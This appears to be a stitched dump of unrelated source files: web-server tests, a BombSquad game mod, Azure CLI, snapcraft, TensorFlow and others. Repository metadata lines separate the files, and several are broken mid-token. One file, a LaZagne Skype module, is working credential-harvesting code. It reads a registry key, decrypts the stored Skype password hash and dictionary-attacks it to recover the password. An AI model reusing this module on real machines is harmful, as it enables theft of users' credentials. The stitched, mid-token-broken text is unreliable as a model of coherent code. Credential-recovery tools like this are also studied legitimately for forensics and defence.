assert excinfo.value.messages == {"user": ["Missing data for required field."]}
def _connect_user(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
def test_not_found_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {"user": "blabla"}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Unknown user"]}
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
"state_public_keys": ["avatar", "bar"],
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert result["public_keys"] == ["avatar", "bar"]
assert sorted_changed == sorted(["bar", "private"])
def test_good_json_no_public_keys(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
assert result["public_keys"] == ["bar"]
|
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert sorted_changed == sorted(["bar", "private"])
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestSubscribeViews(object):
def test_bad_json(sel
|
f, dummy_request):
from channelstream.wsgi_views.server import subscribe
dummy_request.json_body = {}
try:
subscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, subscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["b"],
"channel_configs": {
"a": {"notify_presence": True},
"b": {"notify_presence": True},
},
}
result = subscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["a", "aB", "b"])
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "test"}
]
assert "a" in result["channels_info"]["channels"]
assert "b" in result["channels_info"]["channels"]
assert result["channels_info"]["channels"]["a"]["total_connections"] == 1
assert result["channels_info"]["channels"]["a"]["total_users"] == 1
assert result["channels_info"]["channels"]["a"]["history"] == []
assert result["channels_info"]["channels"]["a"]["users"] == ["test"]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUnsubscribeViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import unsubscribe
dummy_request.json_body = {}
try:
unsubscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "aC"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["aC", "a"],
}
result = unsubscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["aB"])
def test_non_existing_channel(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dum
|
Mrmaxmeier/BombSquad-Community-Mod-Manager
|
mods/BackToYou.py
|
Python
|
unlicense
| 25,208
| 0.012734
|
import bs
import random
import bsUtils
#import PlayerSpaz
def bsGetAPIVersion():
# see bombsquadgame.com/apichanges
return 4
def bsGetGames():
return [BackToYou]
class Icon(bs.Actor):
def __init__(self,player,position,scale,showLives=True,showDeath=True,
nameScale=1.0,nameMaxWidth=115.0,flatness=1.0,shadow=1.0):
bs.Actor.__init__(self)
self._player = player
self._showLives = showLives
self._showDeath = showDeath
self._nameScale = nameScale
self._outlineTex = bs.getTexture('characterIconMask')
icon = player.getIcon()
self.node = bs.newNode('image',
owner=self,
attrs={'texture':icon['texture'],
'tintTexture':icon['tintTexture'],
'tintColor':icon['tintColor'],
'vrDepth':400,
'tint2Color':icon['tint2Color'],
'maskTexture':self._outlineTex,
'opacity':1.0,
'absoluteScale':True,
'attach':'bottomCenter'})
self._nameText = bs.newNode('text',
owner=self.node,
attrs={'text':player.getName(),
'color':bs.getSafeColor(player.getTeam().color),
'hAlign':'center',
'vAlign':'center',
'vrDepth':410,
'maxWidth':nameMaxWidth,
'shadow':shadow,
'flatness':flatness,
'hAttach':'center',
|
'vAttach':'bottom'})
if self._showLives:
self._livesText = bs.newNode('text',
|
owner=self.node,
attrs={'text':'x0',
'color':(1,1,0.5),
'hAlign':'left',
'vrDepth':430,
'shadow':1.0,
'flatness':1.0,
'hAttach':'center',
'vAttach':'bottom'})
self.setPositionAndScale(position,scale)
def setPositionAndScale(self,position,scale):
self.node.position = position
self.node.scale = [70.0*scale]
self._nameText.position = (position[0],position[1]+scale*52.0)
self._nameText.scale = 1.0*scale*self._nameScale
if self._showLives:
self._livesText.position = (position[0]+scale*10.0,position[1]-scale*43.0)
self._livesText.scale = 1.0*scale
def updateForLives(self):
if self._player.exists():
lives = self._player.gameData['lives']
else: lives = 0
if self._showLives:
if lives > 0: self._livesText.text = 'x'+str(lives-1)
else: self._livesText.text = ''
if lives == 0:
myAct = self._player.actor.getActivity()
if self._player in myAct.winners:
if myAct.winners[0] == self._player:
self._livesText.text = "1st"
elif myAct.winners[1] == self._player:
self._livesText.text = "2nd"
elif myAct.winners[2] == self._player:
self._livesText.text = "3rd"
else:
self._nameText.opacity = 0.2
self.node.color = (0.7,0.3,0.3)
self.node.opacity = 0.2
def handlePlayerSpawned(self):
if not self.node.exists(): return
self.node.opacity = 1.0
self.updateForLives()
def handlePlayerDied(self):
if not self.node.exists(): return
if self._showDeath:
bs.animate(self.node,'opacity',{0:1.0,50:0.0,100:1.0,150:0.0,200:1.0,250:0.0,
300:1.0,350:0.0,400:1.0,450:0.0,500:1.0,550:0.2})
lives = self._player.gameData['lives']
if lives == 0: bs.gameTimer(600,self.updateForLives)
class PlayerSpaz_BTY(bs.PlayerSpaz):
def handleMessage(self, m):
if isinstance(m, bs.HitMessage):
if not self.node.exists():
return
if not self.isAlive():
return #We don't want to be hitting corpses!
srcSpaz = None
theGame = self.getActivity()
for theSpaz in theGame.spazList:
if theSpaz.getPlayer() == m.sourcePlayer:
srcSpaz = theSpaz
break
#print(["HitSrc", srcSpaz])
#print(["hitSpaz", self])
if not srcSpaz == self:
if not srcSpaz == None:
#We need to calculate new position for hit. Otherwise it won't
#actually hit the source spaz if he's across the screen
p1 = m.pos
p2 = self.node.position
p3 = srcSpaz.node.position
hit2spaz = [p2[0]-p1[0],p2[1]-p1[1], p2[2]-p1[2]]
m.pos = [p3[0]-hit2spaz[0], p3[1]-hit2spaz[1], p3[2]-hit2spaz[2]]
m.sourcePlayer = self.getPlayer()
#print(['sroucenode', m.srcNode])
#print(['pos', m.pos])
#print(['velocity', m.velocity])
#print(['magnitude',m.magnitude])
#print(['vMag', m.velocityMagnitude])
#print(['radisu', m.radius])
#print([m.sourcePlayer])
#print(['kickback', m.kickBack])
#print(['flat', m.flatDamage])
#print(['hittype', m.hitType])
#print(['forcedir', m.forceDirection])
#print(['Hitsubtype', m.hitSubType])
super(srcSpaz.__class__, srcSpaz).handleMessage(m)
#if isinstance(m, bs.ImpactDamageMessage):
#print(["impact", m.intensity])
#super(self.__class__, self).handleMessage(m)
else:
super(self.__class__, self).handleMessage(m)
class BackToYou(bs.TeamGameActivity):
@classmethod
def getName(cls):
return 'Back To You!'
@classmethod
def getScoreInfo(cls):
return {'scoreName':'Survived',
'scoreType':'seconds',
'noneIsWinner':False,
'lowerIsBetter':True}
@classmethod
def getDescription(cls,sessionType):
return 'Damage others to kill yourself! First one out wins!'
@classmethod
def supportsSessionType(cls,sessionType):
return True if (issubclass(sessionType,bs.TeamsSession)
or issubclass(sessionType,bs.FreeForAllSession)) else False
@classmethod
def getSupportedMaps(cls,sessionType):
return bs.getMapsSupportingPlayType("melee")
@classmethod
def getSettings(cls,sessionType):
settings = [("Lives Per Player",{'default':1,'minValue':1,'maxValue':10,'increment':1}),
("Time Limit",{'choices':[('None',0),('1 Minute',60),
('2 Minutes',120),('5 Minutes',300),
('10 Minutes',600),('20 Minutes',1200)],'default':0}),
("Respawn Times",{'choices':[('Shorter',0.25),('Short',0.5),('Normal',1.0),('Long',2.0),('Longer',4.0)],'default':1.0}),
("Epic Mode",{'default':False})]
if issubclass(sessionType,bs.TeamsSession):
settings.append(("Solo Mode",{'default':False}))
|
Relin/LaZagne
|
Windows/src/LaZagne/softwares/chats/skype.py
|
Python
|
lgpl-3.0
| 4,298
| 0.034435
|
from Crypto.Cipher import AES
import xml.etree.cElementTree as ET
import win32con, win32api, win32crypt
import base64, hashlib, os
import binascii, struct
from config.constant import *
from config.write_output import print_output, print_debug
from config.header import Header
from config.moduleInfo import ModuleInfo
from config.dico import get_dico
class Skype(ModuleInfo):
def __init__(self):
options = {'command': '-s', 'action': 'store_true', 'dest': 'skype', 'help': 'skype'}
ModuleInfo.__init__(self, 'skype', 'chats', options)
|
def aes_encrypt(self, message, passphrase):
IV = '\x00\x00\x00\x00\x00\x00
|
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
# get value used to build the salt
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return 'failed'
# get hash from configuration file
def get_hash_credential(self, xml_file):
tree = ET.ElementTree(file=xml_file)
encrypted_hash = tree.find('Lib/Account/Credentials3')
if encrypted_hash != None:
return encrypted_hash.text
else:
return 'failed'
# decrypt hash to get the md5 to bruteforce
def get_md5_hash(self, enc_hex, key):
# convert hash from hex to binary
enc_binary = binascii.unhexlify(enc_hex)
# retrieve the salt
salt = hashlib.sha1('\x00\x00\x00\x00' + key).digest() + hashlib.sha1('\x00\x00\x00\x01' + key).digest()
# encrypt value used with the XOR operation
aes_key = self.aes_encrypt(struct.pack('I', 0) * 4, salt[0:32])[0:16]
# XOR operation
decrypted = []
for d in range(16):
decrypted.append(struct.unpack('B', enc_binary[d])[0] ^ struct.unpack('B', aes_key[d])[0])
# cast the result byte
tmp = ''
for dec in decrypted:
tmp = tmp + struct.pack(">I", dec).strip('\x00')
# byte to hex
return binascii.hexlify(tmp)
def dictionary_attack(self, login, md5):
wordlist = get_dico()
for word in wordlist:
hash = hashlib.md5('%s\nskyper\n%s' % (login, word)).hexdigest()
if hash == md5:
return word
return False
# main function
def run(self):
# print title
Header().title_info('Skype')
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Skype'
if os.path.exists(directory):
# retrieve the key used to build the salt
key = self.get_regkey()
if key == 'failed':
print_debug('ERROR', 'The salt has not been retrieved')
else:
pwdFound = []
for d in os.listdir(directory):
if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'):
values = {}
try:
values['username'] = d
# get encrypted hash from the config file
enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml')
if enc_hex == 'failed':
print_debug('WARNING', 'No credential stored on the config.xml file.')
else:
# decrypt the hash to get the md5 to brue force
values['hash_md5'] = self.get_md5_hash(enc_hex, key)
values['shema to bruteforce'] = values['username'] + '\\nskyper\\n<password>'
# Try a dictionary attack on the hash
password = self.dictionary_attack(values['username'], values['hash_md5'])
if password:
values['password'] = password
pwdFound.append(values)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Skype", pwdFound)
else:
print_debug('INFO', 'Skype not installed.')
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
|
westpa/westpa
|
src/westext/adaptvoronoi/__init__.py
|
Python
|
mit
| 82
| 0
|
from . import adaptVor_driver
from .adaptVor_driver import AdaptiveVoron
|
oiDrive
|
r
|
QingChenmsft/azure-cli
|
src/azure-cli-core/azure/cli/core/parser.py
|
Python
|
mit
| 9,504
| 0.00263
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import argparse
import argcomplete
import azure.cli.core.telemetry as telemetry
import azure.cli.core._help as _help
from azure.cli.core.util import CLIError
from azure.cli.core._pkg_util import handle_module_not_installed
import azure.cli.core.azlogg
|
ing as azlogging
logger = azlogging.get_az_logger(__name__)
class IncorrectUsageError(CLIError):
'''Raised when a command is incorrectly used and the usage should be
displayed to the user.
'''
pass
class CaseInsensitiveChoicesCompleter(argcomplete.completers.ChoicesCompleter): # pylint: disable=too-few-public-methods
def __call__(self, prefix, **k
|
wargs):
return (c for c in self.choices if c.lower().startswith(prefix.lower()))
# Override the choices completer with one that is case insensitive
argcomplete.completers.ChoicesCompleter = CaseInsensitiveChoicesCompleter
def enable_autocomplete(parser):
argcomplete.autocomplete = argcomplete.CompletionFinder()
argcomplete.autocomplete(parser, validator=lambda c, p: c.lower().startswith(p.lower()),
default_completer=lambda _: ())
class AzCliCommandParser(argparse.ArgumentParser):
"""ArgumentParser implementation specialized for the
Azure CLI utility.
"""
def __init__(self, **kwargs):
self.subparsers = {}
self.parents = kwargs.get('parents', [])
self.help_file = kwargs.pop('help_file', None)
# We allow a callable for description to be passed in in order to delay-load any help
# or description for a command. We better stash it away before handing it off for
# "normal" argparse handling...
self._description = kwargs.pop('description', None)
self.command_source = kwargs.pop('_command_source', None)
super(AzCliCommandParser, self).__init__(**kwargs)
def load_command_table(self, command_table):
"""Load a command table into our parser.
"""
# If we haven't already added a subparser, we
# better do it.
if not self.subparsers:
sp = self.add_subparsers(dest='_command_package')
sp.required = True
self.subparsers = {(): sp}
for command_name, metadata in command_table.items():
subparser = self._get_subparser(command_name.split())
command_verb = command_name.split()[-1]
# To work around http://bugs.python.org/issue9253, we artificially add any new
# parsers we add to the "choices" section of the subparser.
subparser.choices[command_verb] = command_verb
# inject command_module designer's help formatter -- default is HelpFormatter
fc = metadata.formatter_class or argparse.HelpFormatter
command_parser = subparser.add_parser(command_verb,
description=metadata.description,
parents=self.parents,
conflict_handler='error',
help_file=metadata.help,
formatter_class=fc,
_command_source=metadata.command_source)
argument_validators = []
argument_groups = {}
for arg in metadata.arguments.values():
if arg.validator:
argument_validators.append(arg.validator)
if arg.arg_group:
try:
group = argument_groups[arg.arg_group]
except KeyError:
# group not found so create
group_name = '{} Arguments'.format(arg.arg_group)
group = command_parser.add_argument_group(
arg.arg_group, group_name)
argument_groups[arg.arg_group] = group
param = group.add_argument(
*arg.options_list, **arg.options)
else:
try:
param = command_parser.add_argument(
*arg.options_list, **arg.options)
except argparse.ArgumentError:
dest = arg.options['dest']
if dest in ['no_wait', 'raw']:
pass
else:
raise
param.completer = arg.completer
command_parser.set_defaults(
func=metadata,
command=command_name,
_validators=argument_validators,
_parser=command_parser)
def _get_subparser(self, path):
"""For each part of the path, walk down the tree of
subparsers, creating new ones if one doesn't already exist.
"""
for length in range(0, len(path)):
parent_subparser = self.subparsers.get(tuple(path[0:length]), None)
if not parent_subparser:
# No subparser exists for the given subpath - create and register
# a new subparser.
# Since we know that we always have a root subparser (we created)
# one when we started loading the command table, and we walk the
# path from left to right (i.e. for "cmd subcmd1 subcmd2", we start
# with ensuring that a subparser for cmd exists, then for subcmd1,
# subcmd2 and so on), we know we can always back up one step and
# add a subparser if one doesn't exist
grandparent_subparser = self.subparsers[tuple(path[:length - 1])]
new_parser = grandparent_subparser.add_parser(path[length - 1])
# Due to http://bugs.python.org/issue9253, we have to give the subparser
# a destination and set it to required in order to get a
# meaningful error
parent_subparser = new_parser.add_subparsers(dest='subcommand')
parent_subparser.required = True
self.subparsers[tuple(path[0:length])] = parent_subparser
return parent_subparser
def _handle_command_package_error(self, err_msg): # pylint: disable=no-self-use
if err_msg and err_msg.startswith('argument _command_package: invalid choice:'):
import re
try:
possible_module = re.search("argument _command_package: invalid choice: '(.+?)'",
err_msg).group(1)
handle_module_not_installed(possible_module)
except AttributeError:
# regular expression pattern match failed so unable to retrieve
# module name
pass
except Exception as e: # pylint: disable=broad-except
logger.debug('Unable to handle module not installed: %s', str(e))
def validation_error(self, message):
telemetry.set_user_fault('validation error')
return super(AzCliCommandParser, self).error(message)
def error(self, message):
telemetry.set_user_fault('parse error: {}'.format(message))
self._handle_command_package_error(message)
args = {'prog': self.prog, 'message': message}
logger.error('%(prog)s: error: %(message)s', args)
self.print_usage(sys.stderr)
self.exit(2)
def format_help(self):
is_group = self.is_group()
telemetry.set_command_details(command=self.prog[3:])
telemetry.set_success(summary='show help')
_help.show_help(self.prog.split()[1:],
self._actions[-1] if is_group else self,
is_group)
se
|
ubuntu-core/snapcraft
|
snapcraft/plugins/v1/crystal.py
|
Python
|
gpl-3.0
| 4,665
| 0.001501
|
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2019 Manas.Tech
# License granted by Canonical Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""The Crystal plugin can be used for Crystal projects using `shards`.
This plugin uses the common plugin keywords as well as those for "sources".
For more information check the 'plugins' topic for the former and the
'sources' topic for the latter.
Additionally, this plugin uses the following plugin-specific keywords:
- crystal-channel:
(string, default: latest/stable)
The Snap Store channel to install Crystal from.
- crystal-build-options
(list of strings, default: '[]')
Options to use during shards build.
"""
import os
import shutil
from snapcraft import file_utils
from snapcraft.internal import common, elf, errors
from snapcraft.plugins.v1 import PluginV1
_CRYSTAL_CHANNEL = "latest/stable"
class CrystalPlugin(PluginV1):
@classmethod
def schema(cls):
schema = super().schema()
schema["properties"]["crystal-channel"] = {
"type": "string",
"default": _CRYSTAL_CHANNEL,
}
schema["properties"]["crystal-build-options"] = {
"type": "array",
"minitems": 1,
|
"uniqueItems": True,
"items": {"type": "string"},
"default": [],
}
schema["required"] = ["source"]
return schema
@classmethod
def get_build_properties(cls):
return ["crystal-build-options"]
@classmethod
def get_pull_properties(cls):
|
return ["crystal-channel"]
def __init__(self, name, options, project):
super().__init__(name, options, project)
if project._get_build_base() not in ("core", "core16", "core18"):
raise errors.PluginBaseError(
part_name=self.name, base=project._get_build_base()
)
self.build_snaps.append("crystal/{}".format(self.options.crystal_channel))
self.build_packages.extend(
[
"gcc",
"pkg-config",
"libpcre3-dev",
"libevent-dev",
"libyaml-dev",
"libgmp-dev",
"libxml2-dev",
]
)
def build(self):
super().build()
self.run(["shards", "install", "--production"], self.builddir)
self.run(
["shards", "build", "--production"] + self.options.crystal_build_options,
self.builddir,
)
output_bin = os.path.join(self.builddir, "bin")
if not os.path.exists(output_bin):
raise errors.SnapcraftEnvironmentError(
"No binaries were built. Ensure the shards.yaml contains valid targets."
)
install_bin_path = os.path.join(self.installdir, "bin")
bin_paths = (os.path.join(output_bin, b) for b in os.listdir(output_bin))
elf_files = (elf.ElfFile(path=b) for b in bin_paths if elf.ElfFile.is_elf(b))
os.makedirs(install_bin_path, exist_ok=True)
for elf_file in elf_files:
shutil.copy2(
elf_file.path,
os.path.join(install_bin_path, os.path.basename(elf_file.path)),
)
elf_dependencies_path = elf_file.load_dependencies(
root_path=self.installdir,
core_base_path=common.get_installed_snap_path(
self.project._get_build_base()
),
arch_triplet=self.project.arch_triplet,
content_dirs=self.project._get_provider_content_dirs(),
)
for elf_dependency_path in elf_dependencies_path:
lib_install_path = os.path.join(
self.installdir, elf_dependency_path[1:]
)
os.makedirs(os.path.dirname(lib_install_path), exist_ok=True)
if not os.path.exists(lib_install_path):
file_utils.link_or_copy(
elf_dependency_path, lib_install_path, follow_symlinks=True
)
|
LouisPlisso/analysis_tools
|
old_create_hdf5_data_non_interacif.py
|
Python
|
gpl-3.0
| 2,240
| 0.003125
|
import numpy as np
import h5py
f = h5py.File('hdf5/data_streaming.h5', 'w')
ADSL_2008 = f.create_group("ADSL_Montsouris_2008_07_01")
# retreve: ADSL_2008 = f['ADSL_Montsouris_2008_07_01']
gvb_adsl_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_ADSL_cut_BGP_AS.npy')
ADSL_2008.create_dataset('GVB', data=gvb_adsl_2008)
dipcp_adsl_2008 = np.load('python_flows/dipcp_flows_ADSL_juill_2008.npy')
ADSL_2008.create_dataset('dipcp', data=dipcp_adsl_2008)
FTTH_2008 = f.create_group("FTTH_Montsouris_2008_07_01")
# retreve: FTTH_2008 = f['FTTH_Montsouris_2008_07_01']
gvb_ftth_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_FTTH_BGP_AS.npy')
FTTH_2008.create_dataset('GVB', data=gvb_ftth_2008)
dipcp_ftth_2008 = np.load('python_flows/dipcp_flows_FTTH_juill_2008_TCP.npy')
FTTH_2008.create_dataset('dipcp', data=dipcp_ftth_2008)
ADSL_nov_2009 = f.create_group("ADSL_Montsouris_2009_11_26")
gvb_adsl_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_ADSL_BGP_AS.npy')
ADSL_nov_2009.create_dataset('GVB', data=gvb_adsl_nov_2009)
dipcp_adsl_nov_2009 = np.load('python_flows/dipcp_flows_ADSL_nov_2009.npy')
ADSL_nov_2009.create_dataset('dipcp', data=dipcp_adsl_nov_2009)
FTTH_nov_2009 = f.create_group("FTTH_Montsouris_2009_11_26")
gvb_ftth_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_FTTH_BGP_AS.npy')
FTTH_nov_2009.create_dataset('GVB', data=gvb_ftth_nov_2009)
dipcp_ftth_nov_2009
|
= np.load('python_flows/dipcp_flows_FTTH_nov_2009.npy')
FTTH_nov_2009.create_dataset('dipcp', data=dipcp_ftth_nov_2009)
ADSL_dec_2009 = f.create_group("ADSL_Rennes_2009_12_14")
gvb_adsl_dec_2009 = n
|
p.load('python_flows/flows_marked_GVB_dec_2009_ADSL_BGP_AS.npy')
ADSL_dec_2009.create_dataset('GVB', data=gvb_adsl_dec_2009)
dipcp_adsl_dec_2009 = np.load('python_flows/dipcp_flows_ADSL_dec_2009.npy')
ADSL_dec_2009.create_dataset('dipcp', data=dipcp_adsl_dec_2009)
FTTH_dec_2009 = f.create_group("FTTH_Montsouris_2009_12_14")
gvb_ftth_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_FTTH_BGP_AS.npy')
FTTH_dec_2009.create_dataset('GVB', data=gvb_ftth_dec_2009)
dipcp_ftth_dec_2009 = np.load('python_flows/dipcp_flows_FTTH_dec_2009.npy')
FTTH_dec_2009.create_dataset('dipcp', data=dipcp_ftth_dec_2009)
|
byakatat/selenium-training
|
task19_PageObject/test_task19.py
|
Python
|
apache-2.0
| 498
| 0.002008
|
from
|
task19_PageObject.MainPage import MainPage
def test_adding_and_deleting_from_cart(driver):
main_page = MainPage(driver)
main_page.open()
# Add 3 ducks to the cart in a loop
for i in range(1, 4):
# Click at the i-d duck
product_page = main_page.click_to_product_number(i)
product_page.put_product_into_cart()
main_page = product_page.go_to_home_page()
cart_page = main_page.go_to_checkout()
|
cart_page.remove_all_items_from_cart()
|
jiasir/openstack-trove
|
lib/charmhelpers/contrib/openstack/ip.py
|
Python
|
mit
| 2,332
| 0
|
from charmhelpers.core.hookenv import (
config,
unit_get,
)
from charmhelpers.contrib.network.ip import (
get_address_in_network,
is_address_in_network,
is_ipv6,
get_ipv6_addr,
)
from charmhelpers.contrib.hahelpers.cluster import is_clustered
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'
_address_map = {
PUBLIC: {
'config': 'os-public-network',
'fallback': 'public-address'
},
INTERNAL: {
'config': 'os-internal-network',
'fallback': 'private-address'
},
ADMIN: {
'config': 'os-admin-network',
'fallback': 'private-address'
}
}
def canonical_url(configs, endpoint_type=PUBLIC):
'''
Returns the correct HTTP URL to this host given the state of HTTPS
configuration, hacluster and charm configuration.
:configs OSTemplateRenderer: A config tempating object to inspect for
a complete https context.
:endpoint_type str: The endpoint type to resolve.
:returns str: Base URL for services on the current service unit.
'''
scheme = 'http'
if 'https' in configs.complete_contexts():
scheme = 'https'
address = resolve_address(endpoint_type)
if is_ipv6(address):
address = "[{}]".format(address)
return '%s://%s' % (scheme, address)
def resolve_address(endpoint_type=PUBLIC):
resolved_address = None
if is_clustered():
if config(_address_map[endpoint_type]['config']) is None:
# Assume vip is simple and pass back directly
resolved_address = config('vip')
else:
for vip in config('vip').split():
if is_address_in_network(
config(_ad
|
dress_map[endpoint_type]['config']),
vip):
resolved_address = vip
else:
if config('prefer-ipv6'):
fallback_addr = get_ipv6_addr()
else:
fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
resolved_address = get_address_in_
|
network(
config(_address_map[endpoint_type]['config']), fallback_addr)
if resolved_address is None:
raise ValueError('Unable to resolve a suitable IP address'
' based on charm state and configuration')
else:
return resolved_address
|
kevin-coder/tensorflow-fork
|
tensorflow/python/autograph/impl/conversion_test.py
|
Python
|
apache-2.0
| 6,484
| 0.005244
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.pyct import compiler
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted_for_graph(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted_for_graph(test_fn))
self.assertTrue(conversion.is_whitelisted_for_graph(utils))
self.assertTrue(conversion.is_whitelisted_for_graph(constant_op.constant))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
compiler.ast_to_source(fn_node.args.defaults[0]).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
def bar(self):
return self.x
cl
|
ass TestSubclass(TestBase):
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_
|
class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
